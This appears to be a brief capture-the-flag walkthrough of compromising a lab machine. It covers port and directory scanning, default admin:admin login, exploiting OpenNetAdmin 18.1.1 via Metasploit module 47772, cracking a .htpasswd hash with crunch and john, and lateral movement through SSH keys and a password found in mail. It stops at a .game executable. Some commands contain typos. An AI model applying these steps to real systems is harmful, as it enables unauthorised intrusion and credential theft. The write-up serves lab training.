Scanning the host with namp –A –T4 –p- 192.168.12 –vv
Dirb scan dirb http://192.168.1.2 /usr/share/dirb/wordlists/big.txt
The robots.txt have a /ona path, you get to login as guest but you can login as admin:admin, then from the about we can see it’s running OpenNetAdmin version 18.1.1 which in searchsploit have an exploit no. 47772.rb
Copy the exploit to the Metasploit database so we can run it then run the Metasploit
Looking around I could find .htpasswd file in /var/www with the following
So what we have is a username douglas and a hash which we can crack it using a 10 characters password using crunch
Crunch 10 10 aefhrt > rockyou.txt
Then we run john –wordlist=/root/rockyou.txt thehash.txt
We got it cracked and the password is fatherrrrr , now we login as douglas
Now we have 2 similar ways to deal with this either we copy our id_ras.pub to the host and copy it to jen home directory or we just copy douglas id_ras.pub to jen.
I found a mail in /var/mail addressed to jen
New user moss and password Fire!Fire!
We logged into moss account and in his home we found a .game folder inside it there is a executable file we can run